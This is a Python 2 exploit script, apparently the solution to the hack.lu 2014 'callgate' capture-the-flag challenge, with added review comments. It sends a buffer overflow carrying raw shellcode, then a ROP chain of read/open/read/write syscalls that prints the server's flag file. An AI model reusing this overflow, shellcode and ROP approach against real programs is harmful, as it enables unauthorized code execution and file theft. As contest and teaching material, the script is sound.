callsploit.py

#!/urs/bin/python2.7 -u
# NOTE(review): the shebang path looks mistyped ("/urs" instead of "/usr"), so the
# file would only run via an explicit interpreter. "-u" keeps stdout unbuffered,
# which matters because every stage below is delivered with a plain print.
#Exploit for "callgate" - hack.lu 2014
#By nsr from tasteless - www.tasteless.se
#
# Python 2 only: relies on the print statement and on str literals being bytes
# (under Python 3 the print lines are syntax errors and sc would be text).
#
# What the script itself shows, stage by stage:
#   stage 1 (a): 116 bytes of padding, one hard-coded return address into the
#                binary, then a short x86-32 stub -- emitted as one line.
#   stage 2 (b): a ROP chain of four identically shaped frames (read, open, read,
#                write) followed by an exit gadget.
#   stage 3 (c): the NUL-terminated string "flag", consumed by the first read.
# All addresses are fixed (0x0804xxxx text addresses are typical of a non-PIE
# 32-bit ELF), so the chain assumes a stable layout -- presumably no ASLR/PIE on
# the target; verify against the challenge binary.

import struct, time

# Scratch address passed as the buffer argument of every syscall frame below.
# Assumed to be a fixed, writable mapping in the target -- TODO confirm.
addr = 0xffff7800
# Stage-1 stub: 46 bytes of raw x86-32 machine code. From the opcodes it appears
# to store a handful of dwords onto the stack and jump to a fixed address inside
# the binary; disassemble before relying on that description.
sc = '\x89\xe5\xb8\xef\xbe\xad\xde\x89\x04\x24\xb8\x01\x00\x00\x00\x89\x45\x04\x31\xc0\x89\x45\x08\x89\xe8\x83\xe8\x24\x89\x45\x0c\xb8\x00\x02\x00\x00\x89\x45\x10\xb8\x10\x81\x04\x08\xff\xe0'

# First line the target reads; per the author it names a file that exists there.
print '#hello' #valid file on the server

# ---- stage 1: overflow -------------------------------------------------------
a = "A" * 116                      # padding up to the controlled return slot (116 bytes per the author)
a += struct.pack('<I',0x080483a6) #best gadget ever:  push esp ; jl 0x80483ab ; dec cl ; ret
#since the jmp is not taken, eip will point to top of the stack which is under our control AND NX \o/
# i.e. the ret lands on sc, which sits directly after this dword on the stack.
# That only works when the stack is executable (NX not enforced) -- a mitigation
# that defeats this stage outright.
a += sc

print a        # print appends '\n', so one extra byte follows sc on the wire
time.sleep(1)  # let the target consume stage 1 before stage 2 arrives

# ---- stage 2: ROP chain ------------------------------------------------------
# Every frame below has the same shape; the gadget descriptions are the author's:
#   pop edi ; pop ebp ; ret              -> edi = syscall number, ebp = 0xdeadbeef (filler)
#   mov eax, edi ; ret                   -> eax = syscall number
#   0x07000004                           -> the "callgate" entry that performs the syscall,
#                                           taking ebx/ecx/edx from a "register frame"
#                                           (the three dwords at the end of the frame)
#   0x0700001a                           -> a plain ret
#   pop ebx ; pop edi ; pop ebp ; ret    -> consumes those three dwords so execution
#                                           continues at the next frame
# Syscall numbers are x86-32 Linux: 3 = read, 4 = write, 5 = open.
# NOTE(review): how 0x07000004 actually reads the three argument dwords is not
# visible here; the description follows the author's comments -- confirm against
# the binary.

###read###  -- read(0, addr, 0x10): pulls stage 3 (the filename) into addr
b = struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
b += struct.pack('<I',0x3)        #will become eax
b += struct.pack('<I',0xdeadbeef)
b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
b += struct.pack('<I',0x0700001a) #ret
b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
b += struct.pack('<I',0x00) #ebx  (fd 0 = stdin)
b += struct.pack('<I',addr) #ecx  (buffer)
b += struct.pack('<I',0x10) #edx  (length)

###open###  -- open(addr, 0x2000, 10): opens the path just read into addr
b += struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
b += struct.pack('<I',0x5)  #eax
b += struct.pack('<I',0xdeadbeef)
b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
b += struct.pack('<I',0x0700001a) #ret
b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
b += struct.pack('<I',addr) #ebx  (path)
b += struct.pack('<I',0x2000) #ecx  (flags)
b += struct.pack('<I',10) #edx  (mode)

###read###  -- read(4, addr, 0x50): the author assumes the opened file became fd 4
#               (implies fd 3 is already in use on the target -- not visible here)
b += struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
b += struct.pack('<I',0x3)  #eax
b += struct.pack('<I',0xdeadbeef)
b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
b += struct.pack('<I',0x0700001a) #ret
b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
b += struct.pack('<I',0x04) #ebx  (fd)
b += struct.pack('<I',addr) #ecx  (buffer)
b += struct.pack('<I',0x50) #edx  (length)

###write###  -- write(1, addr, 0x50): echoes the buffer to stdout
b += struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
b += struct.pack('<I',0x4)  #eax
b += struct.pack('<I',0xdeadbeef)
b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
b += struct.pack('<I',0x0700001a) #ret
b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
b += struct.pack('<I',0x01) #ebx  (fd 1 = stdout)
b += struct.pack('<I',addr) #ecx  (buffer)
b += struct.pack('<I',0x50) #edx  (length)

###exit - There's got to be time for that###
# Final return target; the author labels it the exit path -- not verified here.
b += struct.pack('<I',0x080483B7)

print b        # chain followed by the '\n' that print appends
time.sleep(1)  # let the chain reach its first read before stage 3 is sent

# ---- stage 3: filename -------------------------------------------------------
# 'flag' plus a terminating NUL. print adds '\n' after it; that byte still fits in
# the 0x10-byte read above and lands after the NUL, so it does not affect the path.
c = 'flag\x00'
print c